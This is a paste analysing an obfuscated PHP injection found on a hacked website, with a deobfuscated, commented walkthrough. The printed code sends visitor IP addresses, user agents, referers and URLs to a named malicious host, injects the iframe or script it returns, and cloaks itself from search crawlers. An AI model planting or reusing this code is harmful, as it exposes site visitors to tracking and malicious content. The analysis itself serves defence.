API tools faq
paste
Advertisement
dirgotronix

PHP Obfuscation

dirgotronix
Apr 3rd, 2011
131
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 15.79 KB | None | 0 0
raw download clone embed print report
  1. <? /*  This script was found lying after the <body> tag of a website whose host had been hacked.  It is an example of significant obfuscation and is subsequently dissected and analyzed below.
  2.      The ten digit numbers use as array names have been changed in case they are uniquely identifiable.
  3.  
  4. <? $GLOBALS['_1234567890_']=Array(base64_decode('c3RyX' .'3JlcGxhY2U='),base64_decode('c' .'3RyX3JlcGxh' .'Y2U='),base64_decode('Y3VybF' .'9pb' .'ml' .'0'),base64_decode('Y' .'3VybF' .'9zZXR' .'vcH' .'Q='),base64_decode('Y3V' .'ybF9' .'zZXRvc' .'HQ='),base64_decode('Y3Vy' .'bF9leG' .'Vj'),base64_decode('' .'Y3VybF' .'9jbG9zZQ=='),base64_decode('c' .'3' .'Vic3' .'RyX2NvdW50'),base64_decode('c3Vic' .'3R' .'yX' .'2NvdW' .'50'),base64_decode('' .'c3V' .'ic3' .'Ry' .'X2' .'NvdW50'),base64_decode('c3' .'Vic3RyX2Nv' .'dW50'),base64_decode('Z2' .'V0aG9' .'zd' .'G' .'J5' .'YWRkc' .'g=='),base64_decode('Z' .'Xhwb' .'G9kZQ=='),base64_decode('ZXhwbG' .'9' .'kZQ=='),base64_decode('' .'dHJpbQ' .'=='),base64_decode('c' .'3Vic3R' .'yX2NvdW50'),base64_decode('' .'c3Vic3RyX2N' .'vdW' .'5' .'0'),base64_decode('c3' .'Vic' .'3' .'Ry' .'X2N' .'vdW5' .'0'),base64_decode('c3Vic3Ry' .'X' .'2N' .'vdW50'),base64_decode('' .'c' .'3Vi' .'c3R' .'yX2NvdW50'),base64_decode('c3Vic' .'3RyX2Nvd' .'W50'),base64_decode('c' .'3V' .'i' .'c3' .'R' .'yX2N' .'vdW50'),base64_decode('c3Vic3RyX2NvdW50'),base64_decode('' .'c3' .'Vi' .'c' .'3' .'RyX' .'2Nvd' .'W50'),base64_decode('c' .'3' .'V' .'ic3RyX2' .'NvdW50'),base64_decode('c3V' .'ic' .'3Ry' .'X2N' .'vdW50'),base64_decode('c3Vic3RyX2' .'NvdW50'),base64_decode('c3Vic3Ry' .'X2NvdW' .'5' .'0'),base64_decode('c3Vic3R' .'y' .'X2NvdW50'),base64_decode('c3V' .'ic3' .'RyX2' .'NvdW5' .'0'),base64_decode('c3Vi' .'c' .'3RyX' .'2N' .'vdW50'),base64_decode('c3' .'Vic3RyX' .'2' .'NvdW50')); ?><? function _0987654321($i){$a=Array('IA==','Kw==','Jg==','LS11dQ==','aHR0cDovL25lYXJkYW1uZ29vZC5pbmZvL2FydGljbGVzL2ltYWdlcy9pZnIucGhwP2tleT0=','Jmhvc3Q9','JmFnZW50PQ==','JnJpcD0=','JnJlZj0=','aWZyYW1l','c2NyaXB0','bm90aGluZ2c=','bm90aGluZ2c=','bm90Zm91bmRk','bm90Zm91bmRk','','SFRUUF9VU0VSX0FHRU5U','UkVNT1RFX0FERFI=','SFRUUF9SRUZFUkVS','SFRUUF9IT1NU','UkVRVUVTVF9VUkk=','','UVVFUllfU1RSSU5H','Lg==','Lg==','NjY=','MjQ5','MjE5','NzQ=','MTI1','NjQ=','MjMz','MTk0','OA==','Z29vZ2xl','R29vZ2xl','cGlkZXI=','UElERVI=','cmF3bGVy','UkFXTEVS','Ym90','Qm90','Qk9U','YXNrLmNvbQ==','TGludXg=','bGludXg=','dHJhbnNsYXRlLmdvb2dsZS5jb20=','TVNJRQ==','RmlyZWZveA==','SFRUUF9IT1NU','bm90Zm91bmRk','bm90aGluZ2c=');return base64_decode($a[$i]);} ?><? function l__0($_0,$_1,$_2,$_3,$_4){$_2=$GLOBALS['_1234567890_'][0](_0987654321(0),_0987654321(1),$_2);$_4=$GLOBALS['_1234567890_'][1](_0987654321(2),_0987654321(3),$_4);$_5=$GLOBALS['_1234567890_'][2](_0987654321(4) .$_0 ._0987654321(5) .$_1 ._0987654321(6) .$_2 ._0987654321(7) .$_3 ._0987654321(8) .$_4);$GLOBALS['_1234567890_'][3]($_5,CURLOPT_HEADER,round(0));$GLOBALS['_1234567890_'][4]($_5,CURLOPT_RETURNTRANSFER,round(0+0.5+0.5));$_6=$GLOBALS['_1234567890_'][5]($_5);$GLOBALS['_1234567890_'][6]($_5);if($GLOBALS['_1234567890_'][7]($_6,_0987654321(9))||$GLOBALS['_1234567890_'][8]($_6,_0987654321(10)))return $_6;elseif($GLOBALS['_1234567890_'][9]($_6,_0987654321(11)))return _0987654321(12);elseif($GLOBALS['_1234567890_'][10]($_6,_0987654321(13)))return _0987654321(14);else return _0987654321(15);}$_2=$_SERVER[_0987654321(16)];$_3=$_SERVER[_0987654321(17)];$_7=$GLOBALS['_1234567890_'][11]($_3);$_4=$_SERVER[_0987654321(18)];$_1=$_SERVER[_0987654321(19)];$_0=$_SERVER[_0987654321(20)];if($_8== _0987654321(21))$_8=$_SERVER[_0987654321(22)];$_1=$GLOBALS['_1234567890_'][12](_0987654321(23),$_1);$_9=$_3;$_3=$GLOBALS['_1234567890_'][13](_0987654321(24),$_3);$_2=$GLOBALS['_1234567890_'][14]($_2);if(($_3[round(0)]== _0987654321(25)&&($_3[round(0+0.2+0.2+0.2+0.2+0.2)]== _0987654321(26)||$_3[round(0+0.2+0.2+0.2+0.2+0.2)]== _0987654321(27)))||($_3[round(0)]== _0987654321(28)&&$_3[round(0+1)]== _0987654321(29))||($_3[round(0)]== _0987654321(30)&&$_3[round(0+1)]== _0987654321(31)&&($_3[round(0+2)]<=round(0+47.75+47.75+47.75+47.75)&&$_3[round(0+0.4+0.4+0.4+0.4+0.4)]>=round(0+32+32+32+32+32)))||($_3[round(0)]== _0987654321(32)&&$_3[round(0+0.2+0.2+0.2+0.2+0.2)]== _0987654321(33))||($GLOBALS['_1234567890_'][15]($_7,_0987654321(34))>round(0))||($GLOBALS['_1234567890_'][16]($_7,_0987654321(35))>round(0))||($GLOBALS['_1234567890_'][17]($_2,_0987654321(36)))||($GLOBALS['_1234567890_'][18]($_2,_0987654321(37)))||($GLOBALS['_1234567890_'][19]($_2,_0987654321(38)))||($GLOBALS['_1234567890_'][20]($_2,_0987654321(39)))||($GLOBALS['_1234567890_'][21]($_2,_0987654321(40)))||($GLOBALS['_1234567890_'][22]($_2,_0987654321(41)))||($GLOBALS['_1234567890_'][23]($_2,_0987654321(42)))||($GLOBALS['_1234567890_'][24]($_2,_0987654321(43)))||($GLOBALS['_1234567890_'][25]($_2,_0987654321(44)))||($GLOBALS['_1234567890_'][26]($_2,_0987654321(45)))||($GLOBALS['_1234567890_'][27]($_2,_0987654321(46)))){}else{if(($GLOBALS['_1234567890_'][28]($_2,_0987654321(47))>round(0))||($GLOBALS['_1234567890_'][29]($_2,_0987654321(48))>round(0))){$_10=l__0($_0,$_SERVER[_0987654321(49)],$_2,$_9,$_4);if($GLOBALS['_1234567890_'][30]($_10,_0987654321(50))){}if($GLOBALS['_1234567890_'][31]($_10,_0987654321(51))){}else if($_10)echo $_10;}} ?>
  5.  
  6. */ ?>
  7. <?
  8. // Part 1: The function array
  9. //
  10. // Levels of obfuscation:
  11. // 1. function names are base64 encoded
  12. //     $string = base64_encode("substr_count");
  13. //     return $string; // returns "c3Vic3RyX2NvdW50"
  14. // 2. the resulting strings are broken apart randomly
  15. //     echo 'str'.'ing'; // "string"
  16. //     i.e. 'c3Vic'.'3R'.'yX'.'2NvdW'.'50'
  17. // 3. those encoded names are placed into an array wrapped by base64_decode()
  18. //     $GLOBALS['_1234567890_'][8] returns "substr_count"
  19.  
  20. $GLOBALS['_1234567890_']=Array(
  21.   base64_decode('c3RyX' .'3JlcGxhY2U='),
  22.   // [0] => "str_replace"
  23.   base64_decode('c' .'3RyX3JlcGxh' .'Y2U='),
  24.   // [1] => "str_replace"
  25.   base64_decode('Y3VybF' .'9pb' .'ml' .'0'),
  26.   // [2] => "curl_init"
  27.   base64_decode('Y' .'3VybF' .'9zZXR' .'vcH' .'Q='),
  28.   // [3] => "curl_setopt"
  29.   base64_decode('Y3V' .'ybF9' .'zZXRvc' .'HQ='),
  30.   // [4] => "curl_setopt"
  31.   base64_decode('Y3Vy' .'bF9leG' .'Vj'),
  32.   // [5] => "curl_exec"
  33.   base64_decode('' .'Y3VybF' .'9jbG9zZQ=='),
  34.   // [6] => "curl_close"
  35.   base64_decode('c' .'3' .'Vic3' .'RyX2NvdW50'),
  36.   // [7] => "substr_count"
  37.   base64_decode('c3Vic' .'3R' .'yX' .'2NvdW' .'50'),
  38.   // [8] => "substr_count"
  39.   base64_decode('' .'c3V' .'ic3' .'Ry' .'X2' .'NvdW50'),
  40.   // [9] => "substr_count"
  41.   base64_decode('c3' .'Vic3RyX2Nv' .'dW50'),
  42.   // [10] => "substr_count"
  43.   base64_decode('Z2' .'V0aG9' .'zd' .'G' .'J5' .'YWRkc' .'g=='),
  44.   // [11] => "gethostbyaddr"
  45.   base64_decode('Z' .'Xhwb' .'G9kZQ=='),
  46.   // [12] => "explode"
  47.   base64_decode('ZXhwbG' .'9' .'kZQ=='),
  48.   // [13] => "explode"
  49.   base64_decode('' .'dHJpbQ' .'=='),
  50.   // [14] => "trim"
  51.   base64_decode('c' .'3Vic3R' .'yX2NvdW50'),
  52.   // [15] => "substr_count"
  53.   base64_decode('' .'c3Vic3RyX2N' .'vdW' .'5' .'0'),
  54.   // [16] => "substr_count"
  55.   base64_decode('c3' .'Vic' .'3' .'Ry' .'X2N' .'vdW5' .'0'),
  56.   // [17] => "substr_count"
  57.   base64_decode('c3Vic3Ry' .'X' .'2N' .'vdW50'),
  58.   // [18] => "substr_count"
  59.   base64_decode('' .'c' .'3Vi' .'c3R' .'yX2NvdW50'),
  60.   // [19] => "substr_count"
  61.   base64_decode('c3Vic' .'3RyX2Nvd' .'W50'),
  62.   // [20] => "substr_count"
  63.   base64_decode('c' .'3V' .'i' .'c3' .'R' .'yX2N' .'vdW50'),
  64.   // [21] => "substr_count"
  65.   base64_decode('c3Vic3RyX2NvdW50'),
  66.   // [22] => "substr_count"
  67.   base64_decode('' .'c3' .'Vi' .'c' .'3' .'RyX' .'2Nvd' .'W50'),
  68.   // [23] => "substr_count"
  69.   base64_decode('c' .'3' .'V' .'ic3RyX2' .'NvdW50'),
  70.   // [24] => "substr_count"
  71.   base64_decode('c3V' .'ic' .'3Ry' .'X2N' .'vdW50'),
  72.   // [25] => "substr_count"
  73.   base64_decode('c3Vic3RyX2' .'NvdW50'),
  74.   // [26] => "substr_count"
  75.   base64_decode('c3Vic3Ry' .'X2NvdW' .'5' .'0'),
  76.   // [27] => "substr_count"
  77.   base64_decode('c3Vic3R' .'y' .'X2NvdW50'),
  78.   // [28] => "substr_count"
  79.   base64_decode('c3V' .'ic3' .'RyX2' .'NvdW5' .'0'),
  80.   // [29] => "substr_count"
  81.   base64_decode('c3Vi' .'c' .'3RyX' .'2N' .'vdW50'),
  82.   // [30] => "substr_count"
  83.   base64_decode('c3' .'Vic3RyX' .'2' .'NvdW50')
  84.   // [31] => "substr_count"
  85.   );
  86. ?>
  87. <?
  88. // Part 2: The string array
  89. //
  90. // Levels of obfuscation:
  91. // 1. The strings are base64_encoded in the same way as above
  92. // 2. The resulting strings are placed into an array
  93.  
  94. function _0987654321($i)
  95. {
  96.     $a=Array(
  97.       'IA==',
  98.       // [0] => " "
  99.       'Kw==',
  100.       // [1] => "+"
  101.       'Jg==',
  102.       // [2] => "&"
  103.       'LS11dQ==',
  104.       // [3] => "--uu"
  105.       'aHR0cDovL25lYXJkYW1uZ29vZC5pbmZvL2FydGljbGVzL2ltYWdlcy9pZnIucGhwP2tleT0=',
  106.       // [4] => "http://neardamngood.info/articles/images/ifr.php?key="
  107.       // Note: Please do not visit this website.  Their code is malicious.
  108.       'Jmhvc3Q9',
  109.       // [5] => "&host="
  110.       'JmFnZW50PQ==',
  111.       // [6] => "&agent="
  112.       'JnJpcD0=',
  113.       // [7] => "&rip="
  114.       'JnJlZj0=',
  115.       // [8] => "&ref="
  116.       'aWZyYW1l',
  117.       // [9] => "iframe"
  118.       'c2NyaXB0',
  119.       // [10] => "script"
  120.       'bm90aGluZ2c=',
  121.       // [11] => "nothingg"
  122.       'bm90aGluZ2c=',
  123.       // [12] => "nothingg"
  124.       'bm90Zm91bmRk',
  125.       // [13] => "notfoundd"
  126.       'bm90Zm91bmRk',
  127.       // [14] => "notfoundd"
  128.       '',
  129.       // [15] => ""
  130.       'SFRUUF9VU0VSX0FHRU5U',
  131.       // [16] => "HTTP_USER_AGENT"
  132.       'UkVNT1RFX0FERFI=',
  133.       // [17] => "REMOTE_ADDR"
  134.       'SFRUUF9SRUZFUkVS',
  135.       // [18] => "HTTP_REFERER"
  136.       'SFRUUF9IT1NU',
  137.       // [19] => "HTTP_HOST"
  138.       'UkVRVUVTVF9VUkk=',
  139.       // [20] => "REQUEST_URI"
  140.       '',
  141.       // [21] => [21] => ""
  142.       'UVVFUllfU1RSSU5H',
  143.       // [22] => "QUERY_STRING"
  144.       'Lg==',
  145.       // [23] => "."
  146.       'Lg==',
  147.       // [24] => "."
  148.       'NjY=',
  149.       // [25] => "66"
  150.       'MjQ5',
  151.       // [26] => "249"
  152.       'MjE5',
  153.       // [27] => "219"
  154.       'NzQ=',
  155.       // [28] => "74"
  156.       'MTI1',
  157.       // [29] => "125"
  158.       'NjQ=',
  159.       // [30] => "64"
  160.       'MjMz',
  161.       // [31] => "233"
  162.       'MTk0',
  163.       // [32] => "194"
  164.       'OA==',
  165.       // [33] => "8"
  166.       'Z29vZ2xl',
  167.       // [34] => "google"
  168.       'R29vZ2xl',
  169.       // [35] => "Google"
  170.       'cGlkZXI=',
  171.       // [36] => "pider"
  172.       'UElERVI=',
  173.       // [37] => "PIDER"
  174.       'cmF3bGVy',
  175.       // [38] => "rawler"
  176.       'UkFXTEVS',
  177.       // [39] => "RAWLER"
  178.       'Ym90',
  179.       // [40] => "bot"
  180.       'Qm90',
  181.       // [41] => "Bot"
  182.       'Qk9U',
  183.       // [42] => "BOT"
  184.       'YXNrLmNvbQ==',
  185.       // [43] => "ask.com"
  186.       'TGludXg=',
  187.       // [44] => "Linux"
  188.       'bGludXg=',
  189.       // [45] => "linux"
  190.       'dHJhbnNsYXRlLmdvb2dsZS5jb20=',
  191.       // [46] => "translate.google.com"
  192.       'TVNJRQ==',
  193.       // [47] => "MSIE"
  194.       'RmlyZWZveA==',
  195.       // [48] => "Firefox"
  196.       'SFRUUF9IT1NU',
  197.       // [49] => "HTTP_HOST"
  198.       'bm90Zm91bmRk',
  199.       // [50] => "notfoundd"
  200.       'bm90aGluZ2c='
  201.       // [51] => "nothingg"
  202.     );
  203.     // Unlike the function array, the string array is
  204.     // wrapped in a function to decode each string called
  205.     //   i.e. _0987654321(34) returns "google"
  206.     return base64_decode($a[$i]);
  207. }
  208. ?>
  209. <?
  210. // The primary function
  211. //
  212. // The purpose of function l__0 is to query an external site for an <iframe> or
  213. // <script> to insert into the current page.  It does this using cURL after
  214. // creating a lengthy query which submits a number of environment variables
  215. // to that external site.
  216. //
  217. // 1. Because the functions and strings are inside arrays with random names,
  218. //    this function becomes a mess of seemingly nonsensical variables.  In order
  219. //    to clarify for readability, I have replaced calls to both arrays with
  220. //    their resulting output.
  221. //      i.e. $_2=$GLOBALS['_1234567890_'][0](_0987654321(0),_0987654321(1),$_2);
  222. //      becomes $_2=str_replace(' ','+',$_2);
  223. // 2. Often times throughout this function, integers are called through a
  224. //    creative use of the round() function, i.e.
  225. //      round(0+0.2+0.2+0.2+0.2+0.2) returns 1 (simple math)
  226.  
  227. function l__0($_0,$_1,$_2,$_3,$_4)
  228. {
  229.     // $_2 is submitted to the function as the output of $_SERVER['HTTP_USER_AGENT']
  230.     $_2 = str_replace(' ', '+', $_2);
  231.     // This replaces any spaces in the useragent with a +
  232.    
  233.     // $_4 == $_SERVER['HTTP_REFERER']
  234.     $_4 = str_replace('&', '--uu', $_4);
  235.     // Leaving &'s in the referrer would mess with the query so they are
  236.     // replaced with --uu
  237.    
  238.     // Create the query
  239.     $_5 = curl_init(
  240.     // Note: Please do not visit this website.  Their code is malicious.
  241.    
  242.         'http://neardamngood.info/articles/images/ifr.php?key='
  243.         . $_0 // $_SERVER['REQUEST_URI']
  244.         . '&host='
  245.         . $_1 // $_SERVER['HTTP_HOST']
  246.         . '&agent='
  247.         . $_2  // $_SERVER['HTTP_USER_AGENT'] (cleaned)
  248.         . '&rip='
  249.         . $_3 // $_SERVER['REMOTE_ADDR']
  250.         . '&ref='
  251.         . $_4 // $_SERVER['HTTP_REFERER'] (cleaned)
  252.         );
  253.         curl_setopt($_5,CURLOPT_HEADER,0);
  254.         // Don't include the header in the output
  255.         curl_setopt($_5,CURLOPT_RETURNTRANSFER,1);
  256.         // Do return the result as a string
  257.         $_6=curl_exec($_5);
  258.         // $_6 now contains a string of whatever output was printed by the
  259.         // remote site when we gave it our environment variables.
  260.     curl_close($_5);
  261.    
  262.     // Error checking the output
  263.     if(
  264.         substr_count($_6, 'iframe') || substr_count($_6, 'script')
  265.     )
  266.     // If the result includes "iframe" or "script", return the result
  267.     return $_6;
  268.    
  269.     elseif(
  270.         substr_count($_6, 'nothingg')
  271.     )
  272.     // If it contains the previous string, return only that string.
  273.         return 'nothingg';
  274.    
  275.     elseif(
  276.         substr_count($_6, 'notfoundd');
  277.     )
  278.     // If it contains the previous string, return only that string.
  279.     return 'notfoundd';
  280.     // Otherwise, return nothing.
  281.     else return '';
  282. }
  283. // Defining the input for the primary function
  284. $_2 = $_SERVER['HTTP_USER_AGENT'];
  285. $_3 = $_SERVER['REMOTE_ADDR'];
  286. $_7 = gethostbyaddr($_3);                   // $_7 is only used to check for
  287.                                             //  google robots
  288. $_4 = $_SERVER['HTTP_REFERER'];
  289. $_1 = $_SERVER['HTTP_HOST'];
  290. $_0 = $_SERVER['REQUEST_URI'];
  291. if($_8 == '') $_8 = $_SERVER['QUERY_STRING'];// This is not used for anything
  292. $_1 = explode('.', $_1);                    // Break the host IP address
  293.                                             //  into an array delineated by "."
  294. $_9 = $_3;                                  // Copy user's IP address into a
  295.                                             //  secondary variable prior to
  296. $_3 = explode('.',$_3);                     //  exploding it the same way
  297. $_2 = trim($_2);
  298.  
  299. // Input verification
  300. // This if() statement checks to see if any of the following apply, and if so,
  301. // to do nothing.
  302.  
  303. // Ip address verification [0].[1].[2].[3]
  304. if(
  305.     ($_3[0]== 66 &&
  306.         ($_3[1]== 249 ||                        // if 66.249.*.* or
  307.          $_3[1]== 219))||                       // 66.219.*.* or
  308. ($_3[0]== 74 && $_3[1]== 125) ||                // 74.125.*.* or
  309. ($_3[0]== 64 && $_3[1]== 233 && ($_3[2] <= 191) && $_3[2]>=160)) ||
  310.                                                 // 64.233.0-191.160-255 or
  311. ($_3[0]== 194 &&$_3[1]== 8) ||                  // 194.8.*.* or
  312.  // User agent verification
  313. (substr_count($_7,'google')>0) ||               // If these strings are found
  314. (substr_count($_7,'Google')>0) ||               //  in the useragent
  315. (substr_count($_2,'pider')) ||
  316. (substr_count($_2,'PIDER')) ||
  317. (substr_count($_2,'rawler')) ||
  318. (substr_count($_2,'RAWLER')) ||
  319. (substr_count($_2,'bot')) ||
  320. (substr_count($_2,'Bot')) ||
  321. (substr_count($_2,'BOT')) ||
  322. (substr_count($_2,'ask.com')) ||
  323. (substr_count($_2,'Linux')) ||
  324. (substr_count($_2,'linux')) ||
  325. (substr_count($_2,'translate.google.com'))
  326. )
  327. {
  328.  // if the ip address falls within the following ranges:
  329.  //   66.249.*.*
  330.  //   66.219.*.*
  331.  //   74.125.*.*
  332.  //   64.233.0-191.160-255
  333.  //   194.8.*.*
  334.  // or if the useragent is a search engine,
  335.  // do nothing.
  336. }
  337. else{
  338. // However, if the useragent is internet explorer or firefox,
  339. if(
  340.     (substr_count($_2, 'MSIE')>0) ||
  341.     (substr_count($_2, 'Firefox')>0)
  342. )
  343. {
  344.     // Send our information and pull the iframe or script from the remote host.
  345.     $_10=l__0($_0,$_SERVER['HTTP_HOST'],$_2,$_9,$_4);
  346.     // $_0 = $_SERVER['REQUEST_URI']
  347.     // $_2 = $_SERVER['HTTP_USER_AGENT']
  348.     // $_9 = $_SERVER['REMOTE_ADDR']
  349.     // $_4 = $_SERVER['HTTP_REFERER']
  350.    
  351.     if(substr_count($_10,'notfoundd'))
  352.     {
  353.         // if the remote host does not return an iframe or script, do nothing
  354.     }
  355.     if(substr_count($_10,'nothingg'))
  356.     {
  357.    
  358.     }
  359.     else if($_10) echo $_10;
  360.     // otherwise, echo the result to the page.
  361. }
  362. }
  363. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!